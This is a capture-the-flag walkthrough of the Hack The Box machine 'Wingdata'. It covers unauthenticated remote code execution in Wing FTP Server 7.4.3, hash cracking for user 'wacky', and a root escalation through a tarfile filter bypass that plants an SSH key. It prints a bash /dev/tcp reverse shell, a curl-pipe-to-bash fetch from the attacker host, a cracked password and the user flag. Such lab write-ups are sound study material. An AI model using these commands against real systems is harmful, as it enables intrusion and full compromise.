Back to Writeups
Easy

Hack The Box: Wingdata - Writeup

A walkthrough of Wingdata (Easy), exploiting Wing FTP Server 7.4.3 for initial access and escalating to root via Python tarfile filter bypass.

April 21, 2026
HTBLinuxWing FTP ServerRCESSHCVE-2025-4138TarfilePrivilege Escalation

1. Reconnaissance

I started with RustScan and version detection:

rustscan -a 10.129.244.106 --ulimit 5000 -- -sC -sV -Pn

Results:

Port State Service Version
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7
80/tcp open http Apache httpd 2.4.66 (Debian)

HTTP redirected to http://wingdata.htb/, so I added it to hosts:

echo "10.129.244.106 wingdata.htb" | sudo tee -a /etc/hosts

2. Web Enumeration

I fuzzed directories first:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories.txt -u http://wingdata.htb/FUZZ

Findings:

  • assets (301)
  • vendor (301)
  • server-status (403)

Then I moved to virtual host enumeration:

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://wingdata.htb/ -H "Host: FUZZ.wingdata.htb" -fw 21

Found one valid subdomain:

  • ftp.wingdata.htb

Added it to hosts:

echo "10.129.244.106 ftp.wingdata.htb" | sudo tee -a /etc/hosts

Browsing the subdomain revealed a Wing FTP login page showing:

  • Wing FTP Server v7.4.3

3. Initial Exploitation - Wing FTP RCE

I checked Searchsploit:

searchsploit wing ftp 7.4.3

Relevant result:

  • Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (52347.py)

I ran the exploit to validate code execution:

python3 exploit.py -u http://ftp.wingdata.htb -c "whoami"

Output confirmed RCE as:

wingftp

Why this works

The exploit abuses a null-byte handling mismatch between a C layer and Lua backend parsing, letting crafted input bypass intended checks and execute arbitrary commands in the web app context.

4. Getting a Reverse Shell

I hosted a bash reverse shell payload locally:

echo 'bash -i >& /dev/tcp/10.10.15.9/4444 0>&1' > shell.sh
python3 -m http.server 8000

Then executed it through the RCE:

python3 exploit.py -u http://ftp.wingdata.htb -c "curl -s http://10.10.15.9:8000/shell.sh | bash"

Listener caught a shell as wingftp.

5. Post-Exploitation Enumeration as wingftp

Inside /opt/wftpserver I found Wing FTP files and keys:

  • wftp_default_ssh.key
  • Data directory with account data

I checked the data directory:

cd /opt/wftpserver/Data
ls

Admin account data:

cat _ADMINISTRATOR/admins.xml

This gave an admin hash, but cracking that was not needed.

Then I looked at domain user files:

ls /opt/wftpserver/Data/1/users

Users included:

  • anonymous.xml
  • john.xml
  • maria.xml
  • steve.xml
  • wacky.xml

From wacky.xml, I extracted the password hash and cracked it using Wing FTP salt format.

Cracked credential:

wacky: !#7Blushing^*Bride5

6. SSH Access as wacky

I authenticated over SSH:

ssh wacky@wingdata.htb

Confirmed shell as wacky and retrieved user flag:

8b0a99de4e332a291e1b71e2d7cdbc93

7. Privilege Escalation to root

Sudo permissions for wacky:

sudo -l

Allowed command:

(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

I reviewed the script and identified risky extraction logic:

with tarfile.open(backup_path, "r") as tar:
    tar.extractall(path=staging_dir, filter="data")

The script extracts attacker-controlled tar files as root. This was exploitable via a tarfile filter bypass pattern (CVE-2025-4138 style path resolution bypass using deep symlink chains).

Exploit strategy

  1. Generate an SSH key pair.
  2. Create a malicious tar that writes the public key into /root/.ssh/authorized_keys.
  3. Run the restore script with sudo.
  4. SSH into localhost as root using the private key.

Generate key:

ssh-keygen -t ed25519 -f wingdata_key -N ""

Build exploit tar (using the crafted script):

python3 exploit.py -o backup_777.tar -p ssh-key -P wingdata_key.pub

Place and trigger restore:

mv backup_777.tar /opt/backup_clients/backups/
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_777.tar -r restore_pwn

SSH as root:

ssh -i wingdata_key root@127.0.0.1

Root shell obtained successfully.

8. Flags

  • User flag: 8b0a99de4e332a291e1b71e2d7cdbc93
  • Root flag: Retrieved from /root/root.txt after root access

9. Attack Chain Summary

This machine was solved by chaining:

  1. VHost discovery (ftp.wingdata.htb).
  2. Unauthenticated RCE in Wing FTP Server 7.4.3.
  3. Credential discovery and hash cracking for user wacky.
  4. SSH pivot from service user to real system user.
  5. Sudo abuse in backup restore workflow using tar extraction bypass to write root authorized keys.

Wingdata is a great example of how one exposed vulnerable service plus weak backup handling can lead to full system compromise.